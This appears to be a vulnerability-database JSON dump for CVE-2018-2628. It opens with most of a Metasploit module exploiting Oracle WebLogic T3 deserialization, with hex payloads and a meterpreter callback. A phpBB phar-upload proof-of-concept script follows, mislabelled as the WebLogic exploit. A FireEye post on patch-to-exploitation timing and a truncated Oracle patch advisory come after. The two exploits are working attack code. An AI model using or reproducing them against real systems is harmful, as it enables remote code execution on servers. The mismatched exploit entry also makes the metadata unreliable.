'1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61' \n@resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67' \n@resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab' \n@resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100' \n@resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a' \n@resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270' \n@resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200' \n@resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076' \n@resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e' \n@resp << '673badd256e7e91d7b470200007078700000000174' \n \n@resp << mycmd \n \n@resp << '74' \n@resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a' \n@resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661' \n@resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b' \n@resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005' \n@resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368' \n@resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61' \n@resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100' \n@resp << '7e005a' \nend \n \n \ndef on_client_connect(client) \n# Make sure to only sent one meterpreter payload to a host. \n# During testing the remote host called back up to 11 times \n# (or as long as the server was listening). \nvprint_status(\"Comparing host: #{client.peerhost}\") \nif @met_sent.include?(client.peerhost) then return end \n@met_sent << client.peerhost \n \nvprint_status(\"met_sent: #{@met_sent}\") \n \n# Response format determined by watching network traffic \n# generated by EDB PoC \naccept_conn = '4e00' \nraccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join \naccept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0') \naccept_conn << raccept_conn \naccept_conn << '0000' \naccept_conn << client.peerport.to_s(16).rjust(4,'0') \n \nclient.put([accept_conn].pack('H*')) \nclient.put([@resp].pack('H*')) \nend \n \ndef t3_handshake \nshake = '74332031322e322e310a41533a323535' \nshake << '0a484c3a31390a4d533a313030303030' \nshake << '30300a0a' \n \nsock.put([shake].pack('H*')) \nsleep(1) \nsock.get_once \nend \n \ndef build_t3_request_object \n# data block is from EDB PoC \ndata = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a' \ndata << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278' \ndata << '700000000a000000030000000000000006007070707070700000000a00000003' \ndata << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e' \ndata << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078' \ndata << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163' \ndata << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69' \ndata << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b' \ndata << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012' \ndata << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271' \ndata << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01' \ndata << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162' \ndata << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e' \ndata << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164' \ndata << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63' \ndata << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265' \ndata << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67' \ndata << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477' \ndata << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549' \ndata << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900' \ndata << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465' \ndata << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a' \ndata << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e' \ndata << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a' \ndata << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072' \ndata << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249' \ndata << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900' \ndata << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465' \ndata << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c' \ndata << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f' \ndata << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665' \ndata << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371' \ndata << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61' \ndata << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374' \ndata << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c' \ndata << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249' \ndata << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365' \ndata << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c' \ndata << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56' \ndata << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200' \ndata << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078' \ndata << '707750210000000000000000000d3139322e3136382e312e323237001257494e' \ndata << '2d4147444d565155423154362e656883348cd6000000070000' \n \ndata << rport.to_s(16).rjust(4, '0') \n \ndata << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00' \ndata << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a' \ndata << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461' \ndata << '863d1d0000000078' \n \nsock.put([data].pack('H*')) \nsleep(2) \nsock.get_once \nend \n \ndef send_payload_objdata \n# JRMPClient2 payload generated from EDB PoC: \n# python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2 \n# Patch in srvhost and srvport \npayload = '056508000000010000001b0000005d0101007372017870737202787000000000' \npayload << '00000000757203787000000000787400087765626c6f67696375720478700000' \npayload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced' \npayload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e' \npayload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000' \npayload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d' \npayload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013' \npayload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870' \npayload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43' \npayload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61' \npayload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061' \npayload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65' \npayload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b' \npayload << '78707702000078fe010000' \n \n# Data \npayload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e' \npayload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50' \npayload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67' \npayload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200' \npayload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76' \npayload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176' \npayload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133' \npayload << '1e030000787077' \n \nunicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join \nunicast_dat = '000a556e696361737452656600' \nunicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0') \nunicast_dat << unicast_srvhost \nunicast_dat << '0000' \nunicast_dat << srvport.to_s(16).rjust(4,'0') \nunicast_dat << '000000004e18654b000000000000000000000000000000' \nunicast_dat << '78' \n \npayload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0') \npayload << unicast_dat \n \npayload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461' \npayload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029' \npayload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669' \npayload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765' \npayload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269' \npayload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174' \npayload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66' \npayload << '6f3b290000001b7878fe00ff' \n \ndata = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0') \ndata << payload \n \nsock.put([data].pack('H*')) \nsleep(1) \nsock.put([data].pack('H*')) \nsleep(1) \nsock.get_once \nend \n \ndef exploit \n@met_sent = [] \ngen_resp \n \nconnect \nvprint_status('Sending handshake...') \nt3_handshake \n \nbuild_t3_request_object \n \nstart_service \n \nvprint_status('Sending payload...') \nsend_payload_objdata \n \n# Need to wait this long to make sure we get a shell back \nsleep(10) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148878/weblogic_deserialize.rb.txt"}, {"lastseen": "2019-03-08T19:21:29", "description": "", "published": "2019-03-07T00:00:00", "type": "packetstorm", "title": "Oracle Weblogic Server Deserialization Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-3245", "CVE-2018-2628"], "modified": "2019-03-07T00:00:00", "id": "PACKETSTORM:152014", "href": "https://packetstormsecurity.com/files/152014/Oracle-Weblogic-Server-Deserialization-Remote-Command-Execution.html", "sourceData": "`// All greets goes to RIPS Tech \n// Run this JS on Attachment Settings ACP page \nvar plupload_salt = ''; \nvar form_token = ''; \nvar creation_time = ''; \nvar filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip \n// your payload here \nvar payload = '<?php __HALT_COMPILER(); ?>\\x0d\\x0a\\xfe\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x01'+'\\x00'.repeat(5)+'\\xc8\\x01\\x00\\x00O:31:\"GuzzleHttp\\x5cCookie\\x5cFileCookieJar\":4:{s:41:\"\\x00GuzzleHttp\\x5cCookie\\x5cFileCookieJar\\x00filename\";s:30:\"/var/www/html/phpBB3/pinfo.php\";s:52:\"\\x00GuzzleHttp\\x5cCookie\\x5cFileCookieJar\\x00storeSessionCookies\";b:1;s:36:\"\\x00GuzzleHttp\\x5cCookie\\x5cCookieJar\\x00cookies\";a:1:{i:0;O:27:\"GuzzleHttp\\x5cCookie\\x5cSetCookie\":1:{s:33:\"\\x00GuzzleHttp\\x5cCookie\\x5cSetCookie\\x00data\";a:3:{s:7:\"Expires\";i:1;s:7:\"Discard\";b:0;s:5:\"Value\";s:17:\"<?php phpinfo();#\";}}}s:39:\"\\x00GuzzleHttp\\x5cCookie\\x5cCookieJar\\x00strictMode\";N;}\\x08\\x00\\x00\\x00test.txt\\x04\\x00\\x00\\x00K>\\x10\\x5c\\x04\\x00\\x00\\x00\\x0c~\\x7f\\xd8\\xb6\\x01'+'\\x00'.repeat(6)+'test\\xa0\\x17\\xd2\\xe0R\\xcf \\xf6T\\x1d\\x01X\\x91(\\x9dD]X\\x0b>\\x02\\x00\\x00\\x00GBMB'; \nvar byteArray = Uint8Array.from(payload, function(c){return c.codePointAt(0);}); \nvar sid = (new URL(document.location.href)).searchParams.get('sid'); \nvar url = '/adm/index.php'; \nvar getparams = { \n'i': 'acp_database', \n'sid': sid, \n'mode': 'backup' \n}; \n$.get(url, getparams, function(data) { \nform_token = $(data).find('[name=\"form_token\"]').val(); \ncreation_time = $(data).find('[name=\"creation_time\"]').val(); \nif(form_token && creation_time) { \nvar posturl = '/adm/index.php?i=acp_database&sid=|&mode=backup&action=download'; \nvar postdata = { \n'type': 'data', \n'method': 'text', \n'where': 'download', \n'table[]': 'phpbb_config', \n'submit': 'Submit', \n'creation_time': creation_time, \n'form_token': form_token \n} \n$.post(posturl.replace(\"|\", sid), postdata, function (data) { \nplupload_salt = data.match(/plupload_salt',\\s*'(\\w{32})/)[1]; \nif (plupload_salt) { \nfilepath = filepath.replace(\"$salt\", plupload_salt); \nvar postdata = new FormData(); \npostdata.append('name', 'evil.zip'); \npostdata.append('chunk', 0); \npostdata.append('chunks', 2); \npostdata.append('add_file', 'Add the file'); \npostdata.append('real_filename', 'evil.zip'); \n// file \nvar pharfile = new File([byteArray], 'evil.zip'); \npostdata.append('fileupload', pharfile); \njQuery.ajax({ \nurl: '/posting.php?mode=reply&f=2&t=1', \ndata: postdata, \ncache: false, \ncontentType: false, \nprocessData: false, \nmethod: 'POST', \nsuccess: function(data){ \nif (\"id\" in data) { \n$('#img_imagick').val(filepath).focus(); \n$('html, body').animate({ \nscrollTop: ($('#submit').offset().top) \n}, 500); \n} \n} \n}); \n \n} \n}, 'text'); \n} \n}); \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152014/oraclewls-deserializeexec.txt"}], "fireeye": [{"lastseen": "2020-11-23T01:38:39", "bulletinFamily": "info", "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2018-0101", "CVE-2018-0296", "CVE-2018-11776", "CVE-2018-15982", "CVE-2018-20250", "CVE-2018-2628", "CVE-2018-2893", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-8440", "CVE-2019-0863", "CVE-2019-3396", "CVE-2019-6340"], "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations. Check out our first post on zero-day vulnerabilities._\n\nAttackers are in a constant race to exploit newly discovered vulnerabilities before defenders have a chance to respond. FireEye Mandiant Threat Intelligence research into vulnerabilities exploited in 2018 and 2019 suggests that the majority of exploitation in the wild occurs before patch issuance or within a few days of a patch becoming available.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/vulnmanage2/Picture1.png) \nFigure 1: Percentage of vulnerabilities exploited at various times in relation to patch release\n\nFireEye Mandiant Threat Intelligence analyzed 60 vulnerabilities that were either exploited or assigned a CVE number between Q1 2018 to Q3 2019. The majority of vulnerabilities were exploited as zero-days \u2013 before a patch was available. More than a quarter were exploited within one month after the patch date. Figure 2 illustrates the number of days between when a patch was made available and the first observed exploitation date for each vulnerability.\n\nWe believe these numbers to be conservative estimates, as we relied on the first reported exploitation of a vulnerability linked to a specific date. Frequently, first exploitation dates are not publicly disclosed. It is also likely that in some cases exploitation occurred without being discovered before researchers recorded exploitation attached to a certain date.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/vulnmanage2/Picture2.png) \nFigure 2: Time between vulnerability exploitation and patch issuance\n\n\u00ad\u00ad\u00ad_Time Between Disclosure and Patch Release_\n\nThe average time between disclosure and patch availability was approximately 9 days. This average is slightly inflated by vulnerabilities such as CVE-2019-0863, a Microsoft Windows server vulnerability, which was disclosed in December 2018 and not patched until 5 months later in May 2019. The majority of these vulnerabilities, however, were patched quickly after disclosure. In 59% of cases, a patch was released on the same day the vulnerability was disclosed. These metrics, in combination with the observed swiftness of adversary exploitation activity, highlight the importance of responsible disclosure, as it may provide defenders with the slim window needed to successfully patch vulnerable systems.\n\n_Exploitation After Patch Release_\n\nWhile the majority of the observed vulnerabilities were zero-days, 42 percent of vulnerabilities were exploited after a patch had been released. For these non-zero-day vulnerabilities, there was a very small window (often only hours or a few days) between when the patch was released and the first observed instance of attacker exploitation. Table 1 provides some insight into the race between attackers attempting to exploit vulnerable software and organizations attempting to deploy the patch.\n\n**Time to Exploit for Vulnerabilities First Exploited after a Patch** \n \n--- \n \nHours\n\n| \n\nTwo vulnerabilities were successfully exploited within hours of a patch release, CVE-2018-2628 and CVE-2018-7602. \n \nDays\n\n| \n\n12 percent of vulnerabilities were exploited within the first week following the patch release. \n \nOne Month\n\n| \n\n15 percent of vulnerabilities were exploited after one week but within one month of patch release. \n \nYears\n\n| \n\nIn multiple cases, such as the first observed exploitation of CVE-2010-1871 and CVE-2012-0874 in 2019, attackers exploited vulnerabilities for which a patch had been made available many years prior. \n \nTable 1: Exploitation timing for patched vulnerabilities ranges from within hours of patch issuance to years after initial disclosure\n\n#### Case Studies\n\nWe continue to observe espionage and financially motivated groups quickly leveraging publicly disclosed vulnerabilities in their operations. The following examples demonstrate the speed with which sophisticated groups are able to incorporate vulnerabilities into their toolsets following public disclosure and the fact that multiple disparate groups have repeatedly leveraged the same vulnerabilities in independent campaigns. Successful operations by these types of groups are likely to have a high potential impact.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/vulnmanage2/Picture3.png) \nFigure 3: Timeline of activity for CVE-2018-15982\n\nCVE-2018-15982: A use after free vulnerability in a file package in Adobe Flash Player 31.0.0.153 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. This vulnerability was exploited by espionage groups\u2014Russia's APT28 and North Korea's APT37\u2014as well as TEMP.MetaStrike and other financially motivated attackers.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/vulnmanage2/Picture4.png) \nFigure 4: Timeline of activity for CVE-2018-20250\n\nCVE-2018-20250: A path traversal vulnerability exists within the ACE format in the archiver tool WinRAR versions 5.61 and earlier that, when exploited, allows an attacker to locally execute arbitrary code. This vulnerability was exploited by multiple espionage groups, including Chinese, North Korean, and Russian, groups, as well as Iranian groups APT33 and TEMP.Zagros.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/vulnmanage2/Picture5.png) \nFigure 5: Timeline of Activity for CVE-2018-4878\n\nCVE-2018-4878: A use after free vulnerability exists within the DRMManager\u2019s \u201cinitialize\u201d call in Adobe Flash Player 28.0.0.137 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. Mandiant Intelligence confirmed that North Korea\u2019s APT37 exploited this vulnerability as a zero-day as early as September 3, 2017. Within 8 days of disclosure, we observed Russia\u2019s APT28 also leverage this vulnerability, with financially motivated attackers and North Korea\u2019s TEMP.Hermit also using within approximately a month of disclosure.\n\n#### Availability of PoC or Exploit Code\n\nThe availability of POC or exploit code on its own does not always increase the probability or speed of exploitation. However, we believe that POC code likely hastens exploitation attempts for vulnerabilities that do not require user interaction. For vulnerabilities that have already been exploited, the subsequent introduction of publicly available exploit or POC code indicates malicious actor interest and makes exploitation accessible to a wider range of attackers. There were a number of cases in which certain vulnerabilities were exploited on a large scale within 48 hours of PoC or exploit code availability (Table 2).\n\n**Time Between PoC or Exploit Code Publication and First Observed Potential Exploitation Events**\n\n| \n\n**Product**\n\n| \n\n**CVE**\n\n| \n\n**FireEye Risk Rating** \n \n---|---|---|--- \n \n1 day\n\n| \n\nWinRAR\n\n| \n\nCVE-2018-20250\n\n| \n\nMedium \n \n1 day\n\n| \n\nDrupal\n\n| \n\nCVE-2018-7600\n\n| \n\nHigh \n \n1 day\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0296\n\n| \n\nMedium \n \n2 days\n\n| \n\nApache Struts\n\n| \n\nCVE-2018-11776\n\n| \n\nHigh \n \n2 days\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0101\n\n| \n\nHigh \n \n2 days\n\n| \n\nOracle WebLogic Server\n\n| \n\nCVE-2018-2893\n\n| \n\nHigh \n \n2 days\n\n| \n\nMicrosoft Windows Server\n\n| \n\nCVE-2018-8440\n\n| \n\nMedium \n \n2 days\n\n| \n\nDrupal\n\n| \n\nCVE-2019-6340\n\n| \n\nMedium \n \n2 days\n\n| \n\nAtlassian Confluence\n\n| \n\nCVE-2019-3396\n\n| \n\nHigh \n \nTable 2: Vulnerabilities exploited within two days of either PoC or exploit code being made publicly available, Q1 2018\u2013Q3 2019\n\n#### Trends by Targeted Products\n\nFireEye judges that malicious actors are likely to most frequently leverage vulnerabilities based on a variety of factors that influence the utility of different vulnerabilities to their specific operations. For instance, we believe that attackers are most likely to target the most widely used products (see Figure 6). Attackers almost certainly also consider the cost and availability of an exploit for a specific vulnerability, the perceived success rate based on the delivery method, security measures introduced by vendors, and user awareness around certain products.\n\nThe majority of observed vulnerabilities were for Microsoft products, likely due to the ubiquity of Microsoft offerings. In particular, vulnerabilities in software such as Microsoft Office Suite may be appealing to malicious actors based on the utility of email attached documents as initial infection vectors in phishing campaigns.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/vulnmanage2/Picture6.png) \nFigure 6: Exploited vulnerabilities by vendor, Q1 2018\u2013Q3 2019\n\n#### Outlook and Implications\n\nThe speed with which attackers exploit patched vulnerabilities emphasizes the importance of patching as quickly as possible. With the sheer quantity of vulnerabilities disclosed each year, however, it can be difficult for organizations with limited resources and business constraints to implement an effective strategy for prioritizing the most dangerous vulnerabilities. In upcoming blog posts, FireEye Mandiant Threat Intelligence describes our approach to vulnerability risk rating as well as strategies for making informed and realistic patch management decisions in more detail.\n\nWe recommend using this exploitation trend information to better prioritize patching schedules in combination with other factors, such as known active threats to an organization's industry and geopolitical context, the availability of exploit and PoC code, commonly impacted vendors, and how widely software is deployed in an organization's environment may help to mitigate the risk of a large portion of malicious activity.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n", "modified": "2020-04-13T12:00:00", "published": "2020-04-13T12:00:00", "id": "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "href": "https://www.fireeye.com/blog/threat-research/2020/04/time-between-disclosure-patch-release-and-vulnerability-exploitation.html", "type": "fireeye", "title": "Think Fast: Time Between Disclosure, Patch Release and Vulnerability\nExploitation \u2014 Intelligence for Vulnerability Management, Part Two", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2020-10-04T21:15:53", "bulletinFamily": "software", "cvelist": ["CVE-2013-1768", "CVE-2014-0054", "CVE-2015-7501", "CVE-2015-7940", "CVE-2016-0635", "CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-3092", "CVE-2016-3506", "CVE-2016-5007", "CVE-2016-5019", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6305", "CVE-2016-6306", "CVE-2016-6307", "CVE-2016-6308", "CVE-2016-6309", "CVE-2016-6814", "CVE-2016-7052", "CVE-2016-8745", "CVE-2016-9878", "CVE-2017-10393", "CVE-2017-10400", "CVE-2017-12617", "CVE-2017-13077", "CVE-2017-13078", "CVE-2017-13080", "CVE-2017-13082", "CVE-2017-15095", "CVE-2017-15707", "CVE-2017-17562", "CVE-2017-3735", "CVE-2017-3736", "CVE-2017-3737", "CVE-2017-3738", "CVE-2017-5645", "CVE-2017-5662", "CVE-2017-5664", "CVE-2017-5715", "CVE-2017-5753", "CVE-2017-5754", "CVE-2017-7525", "CVE-2017-7674", "CVE-2017-7805", "CVE-2017-9798", "CVE-2018-0739", "CVE-2018-2563", "CVE-2018-2572", "CVE-2018-2587", "CVE-2018-2628", "CVE-2018-2718", "CVE-2018-2737", "CVE-2018-2738", "CVE-2018-2739", "CVE-2018-2742", "CVE-2018-2746", "CVE-2018-2747", "CVE-2018-2748", "CVE-2018-2749", "CVE-2018-2750", "CVE-2018-2752", "CVE-2018-2753", "CVE-2018-2754", "CVE-2018-2755", "CVE-2018-2756", "CVE-2018-2758", "CVE-2018-2759", "CVE-2018-2760", "CVE-2018-2761", "CVE-2018-2762", "CVE-2018-2763", "CVE-2018-2764", "CVE-2018-2765", "CVE-2018-2766", "CVE-2018-2768", "CVE-2018-2769", "CVE-2018-2770", "CVE-2018-2771", "CVE-2018-2772", "CVE-2018-2773", "CVE-2018-2774", "CVE-2018-2775", "CVE-2018-2776", "CVE-2018-2777", "CVE-2018-2778", "CVE-2018-2779", "CVE-2018-2780", "CVE-2018-2781", "CVE-2018-2782", "CVE-2018-2783", "CVE-2018-2784", "CVE-2018-2785", "CVE-2018-2786", "CVE-2018-2787", "CVE-2018-2788", "CVE-2018-2789", "CVE-2018-2790", "CVE-2018-2791", "CVE-2018-2792", "CVE-2018-2793", "CVE-2018-2794", "CVE-2018-2795", "CVE-2018-2796", "CVE-2018-2797", "CVE-2018-2798", "CVE-2018-2799", "CVE-2018-2800", "CVE-2018-2801", "CVE-2018-2802", "CVE-2018-2803", "CVE-2018-2804", "CVE-2018-2805", "CVE-2018-2806", "CVE-2018-2807", "CVE-2018-2808", "CVE-2018-2809", "CVE-2018-2810", "CVE-2018-2811", "CVE-2018-2812", "CVE-2018-2813", "CVE-2018-2814", "CVE-2018-2815", "CVE-2018-2816", "CVE-2018-2817", "CVE-2018-2818", "CVE-2018-2819", "CVE-2018-2820", "CVE-2018-2821", "CVE-2018-2822", "CVE-2018-2823", "CVE-2018-2824", "CVE-2018-2825", "CVE-2018-2826", "CVE-2018-2827", "CVE-2018-2828", "CVE-2018-2829", "CVE-2018-2830", "CVE-2018-2831", "CVE-2018-2832", "CVE-2018-2833", "CVE-2018-2834", "CVE-2018-2835", "CVE-2018-2836", "CVE-2018-2837", "CVE-2018-2838", "CVE-2018-2839", "CVE-2018-2840", "CVE-2018-2841", "CVE-2018-2842", "CVE-2018-2843", "CVE-2018-2844", "CVE-2018-2845", "CVE-2018-2846", "CVE-2018-2847", "CVE-2018-2848", "CVE-2018-2849", "CVE-2018-2850", "CVE-2018-2851", "CVE-2018-2852", "CVE-2018-2853", "CVE-2018-2854", "CVE-2018-2855", "CVE-2018-2856", "CVE-2018-2857", "CVE-2018-2858", "CVE-2018-2859", "CVE-2018-2860", "CVE-2018-2861", "CVE-2018-2862", "CVE-2018-2863", "CVE-2018-2864", "CVE-2018-2865", "CVE-2018-2866", "CVE-2018-2867", "CVE-2018-2868", "CVE-2018-2869", "CVE-2018-2870", "CVE-2018-2871", "CVE-2018-2872", "CVE-2018-2873", "CVE-2018-2874", "CVE-2018-2876", "CVE-2018-2877", "CVE-2018-2878", "CVE-2018-2879", "CVE-2018-7489"], "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n * Critical Patch Updates, Security Alerts and Bulletins for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 255 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2018 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/epmos/faces/DocumentDisplay?id=2383583.1>).\n\nThe January 2018 Critical Patch Update provided patches in response to the Spectre (CVE-2017-5753, CVE-2017-5715) and Meltdown (CVE-2017-5754) processor vulnerabilities. Please refer to this Advisory and the Addendum to the January 2018 Critical Patch Update Advisory for Spectre and Meltdown MOS note ([Doc ID 2347948.1](<https://support.oracle.com/epmos/faces/DocumentDisplay?id=2347948.1>)) for information on how to obtain these patches.\n", "modified": "2018-12-10T00:00:00", "published": "2018-04-17T00:00:00", "id": "ORACLE:CPUAPR2018", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - April 2018", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:20:57", "bulletinFamily": "software", "cvelist": ["CVE-2018-2768", "CVE-2018-2802", "CVE-2018-2775", "CVE-2018-2815", "CVE-2018-2748", "CVE-2018-2836", "CVE-2017-9798", "CVE-2018-2878", "CVE-2018-2826", "CVE-2018-2827", "CVE-2017-5753", "CVE-2017-5754", "CVE-2018-2817", "CVE-2018-2800", "CVE-2018-2868", "CVE-2018-2832", "CVE-2018-2789", "CVE-2018-2852", "CVE-2018-2808", "CVE-2018-2749", "CVE-2018-2747", "CVE-2018-2563", "CVE-2018-2860", "CVE-2018-2769", "CVE-2017-13080", "CVE-2016-5019", "CVE-2018-2776", "CVE-2018-7489", "CVE-2016-6306", "CVE-2018-2841", "CVE-2018-2759", "CVE-2016-2183", "CVE-2018-2870", "CVE-2018-2844", "CVE-2018-2822", "CVE-2018-2853", "CVE-2018-2746", "CVE-2016-2178", "CVE-2018-2755", "CVE-2018-2810", "CVE-2018-2812", "CVE-2018-2803", "CVE-2016-9878", "CVE-2017-10400", "CVE-2017-3735", "CVE-2018-2823", "CVE-2018-2842", "CVE-2018-2786", "CVE-2018-2778", 